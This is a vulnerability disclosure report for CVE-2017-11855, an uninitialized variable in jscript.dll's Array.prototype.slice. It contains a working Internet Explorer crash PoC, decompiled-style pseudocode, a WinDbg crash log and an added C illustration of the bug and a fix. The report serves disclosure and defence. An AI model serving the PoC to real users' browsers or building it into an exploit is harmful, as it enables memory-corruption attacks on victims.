Windows: Uninitialized variable in jscript!JsArraySlice
CVE-2017-11855
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process; it might not work very reliably due to the nature of the issue, please see the technical details below):
============================================
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above; all other lines are just fuzzer-generated junk that puts the stack into the 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
    VAR object;
    VAR length;            // never initialized
    NameTbl *nametable;
    if(!ConvertToObject(session, this, &object, 0)) {
        //set error and return
    }
    if(!IsJSObject(&object, &nametable)) {
        //set error and return
    }
    // only a negative return value is treated as failure
    if(nametable->GetVal(&g_sym_length, &length) < 0) {
        //set error and return
    }
    if(length.type != TYPE_INT) {
        ConvertToScalar(session, &length, &length, 3, 1);
    }
    ...
}
The issue is that JsArraySlice() expects NameTbl::GetVal() to return an integer < 0 if the input object does not contain the 'length' property. However, in this case NameTbl::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus, if NameTbl::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of the length VAR, this might lead to exploitable conditions, including calling a virtual method on the uninitialized pointer (see below).
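The return-value mismatch described above, next to one way to harden it, as an added example that is not code from the report or from jscript.dll. The VAR layout, type constants, `get_val()` and its 0 / 1 / negative contract are hypothetical stand-ins, and the "stale" initializer is a constructed marker that models leftover stack contents.

```c
#include <stdio.h>

/* Hypothetical stand-ins for the jscript types named in the report. */
enum { TYPE_EMPTY = 0, TYPE_INT = 3, TYPE_STALE = 0x81 };
typedef struct { int type; long long value; } VAR;

/* Assumed contract, modeled on the report: 0 = found and *out written,
   1 = property absent and *out left untouched, <0 = error. */
static int get_val(int has_length, VAR *out) {
    if (!has_length) return 1;
    out->type = TYPE_INT;
    out->value = 4;
    return 0;
}

/* Reported pattern: only a negative result counts as failure. The local is
   pre-filled with a constructed marker standing in for stale stack bytes,
   so the demo stays well-defined C. Returns 1 if `length` would be used. */
int slice_length_vulnerable(int has_length, VAR *seen) {
    VAR length = { TYPE_STALE, 0x4e4e4e4e };
    if (get_val(has_length, &length) < 0) return 0;
    *seen = length;               /* would be handed to ConvertToScalar() */
    return 1;
}

/* Hardened pattern: initialize the local and accept only the success code.
   An absent length becomes integer 0, as ToUint32(undefined) is 0. */
int slice_length_hardened(int has_length, VAR *seen) {
    VAR length = { TYPE_EMPTY, 0 };
    int rc = get_val(has_length, &length);
    if (rc < 0) return 0;
    if (rc != 0) { length.type = TYPE_INT; length.value = 0; }
    *seen = length;
    return 1;
}

int main(void) {
    VAR v;
    slice_length_vulnerable(0, &v);
    printf("vulnerable, no length: type=0x%x\n", (unsigned)v.type);
    slice_length_hardened(0, &v);
    printf("hardened,   no length: type=0x%x value=%lld\n", (unsigned)v.type, v.value);
    return 0;
}
```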
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080
r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
r14=000002a7533c5a70 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,r14
============================================
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: ifratric